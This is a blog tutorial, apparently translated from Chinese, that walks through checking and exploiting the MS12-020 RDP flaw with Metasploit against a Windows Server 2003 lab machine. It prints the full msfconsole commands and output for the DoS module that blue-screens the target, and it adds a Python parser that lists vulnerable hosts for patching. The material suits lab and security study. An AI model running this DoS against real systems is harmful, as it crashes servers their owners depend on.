
Using Metasploit (MSF) to exploit the MS12-020 vulnerability on Windows

Date: 2019-06-08 07:45:15  Source: IT Technology  Author: seo实验室小编  Reads: 64

ms12-020

Preface

If an attacker sends a sequence of specially crafted RDP packets to an affected system, this vulnerability can cause a denial of service or allow remote code execution. By default, the Remote Desktop Protocol (RDP, default port 3389) is not enabled on any Windows operating system; systems without RDP enabled are not at risk. In this experiment the target system is subjected to a DoS attack.

0x01 Lab environment

Attacker machine: Kali Linux

IP: 192.168.8.130

Target machine: Windows Server 2003 Enterprise x64 SP2

IP: 192.168.8.129

0x02 Vulnerability verification

Use the MSF module auxiliary/scanner/rdp/ms12_020_check to verify whether the target host is affected by this vulnerability:

msf > use auxiliary/scanner/rdp/ms12_020_check
msf auxiliary(ms12_020_check) > set RHOSTS 192.168.8.129
msf auxiliary(ms12_020_check) > info

       Name: MS12-020 Microsoft Remote Desktop Checker
     Module: auxiliary/scanner/rdp/ms12_020_check
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Royce Davis "R3dy" <[email protected]>
  Brandon McCann "zeknox" <[email protected]>

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS   192.168.8.129    yes       The target address range or CIDR identifier
  RPORT    3389             yes       Remote port running RDP (TCP)
  THREADS  100              yes       The number of concurrent threads

Description:
  This module checks a range of hosts for the MS12-020 vulnerability. 
  This does not cause a DoS on the target.

References:
  https://cvedetails.com/cve/CVE-2012-0002/
  https://technet.microsoft.com/en-us/library/security/MS12-020
  http://technet.microsoft.com/en-us/security/bulletin/ms12-020
  https://www.exploit-db.com/exploits/18606
  https://svn.nmap.org/nmap/scripts/rdp-vuln-ms12-020.nse

After running it, the output shows that the target system is vulnerable:

msf auxiliary(ms12_020_check) > run

[+] 192.168.8.129:3389    - 192.168.8.129:3389 - The target is vulnerable.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
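As an added example (not part of the original post), a small Python parser that turns the output of the ms12_020_check module, as shown above, into a per-host list of systems that need the MS12-020 patch. The first status line in the embedded sample is the one from this page; the second ("not vulnerable") line is constructed, and its exact wording is an assumption.

```python
import re
from typing import Dict, List

# Constructed sample of msfconsole output from auxiliary/scanner/rdp/ms12_020_check.
# Line 1 of the results is taken from this page; the "not vulnerable" line is an
# assumed format added for illustration.
SAMPLE_OUTPUT = """\
msf auxiliary(ms12_020_check) > run

[+] 192.168.8.129:3389    - 192.168.8.129:3389 - The target is vulnerable.
[*] 192.168.8.130:3389    - 192.168.8.130:3389 - The target is not vulnerable.
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
"""

# One msf per-host status line: "[tag] host:port - host:port - message".
_STATUS_LINE = re.compile(
    r"^\[(?P<tag>[+*!-])\]\s+"
    r"(?P<host>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)\s+-\s+.*?-\s+"
    r"(?P<msg>.+?)\s*$"
)


def parse_check_output(text: str) -> Dict[str, str]:
    """Map 'host:port' -> 'vulnerable' | 'not_vulnerable' | 'unknown'."""
    results: Dict[str, str] = {}
    for line in text.splitlines():
        m = _STATUS_LINE.match(line)
        if not m:
            continue  # prompt, progress and completion lines carry no verdict
        key = f"{m['host']}:{m['port']}"
        msg = m["msg"].lower()
        if "not vulnerable" in msg:
            results[key] = "not_vulnerable"
        elif m["tag"] == "+" and "vulnerable" in msg:
            results[key] = "vulnerable"
        else:
            results[key] = "unknown"
    return results


def needs_patching(results: Dict[str, str]) -> List[str]:
    """Sorted list of host:port entries that the check flagged as vulnerable."""
    return sorted(k for k, v in results.items() if v == "vulnerable")


if __name__ == "__main__":
    for entry in needs_patching(parse_check_output(SAMPLE_OUTPUT)):
        print(f"{entry}: apply the MS12-020 update or disable RDP")
```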

0x03 Exploitation

msf auxiliary(ms12_020_check) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > show options 

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.8.129    yes       The target address
   RPORT  3389             yes       The target port (TCP)
msf auxiliary(ms12_020_maxchannelids) > run

[*] 192.168.8.129:3389 - 192.168.8.129:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.8.129:3389 - 192.168.8.129:3389 - 210 bytes sent
[*] 192.168.8.129:3389 - 192.168.8.129:3389 - Checking RDP status...
[+] 192.168.8.129:3389 - 192.168.8.129:3389 seems down
[*] Auxiliary module execution completed

After the module runs, the target system (Windows Server 2003) blue-screens and crashes:

(screenshot: Windows Server 2003 blue screen)
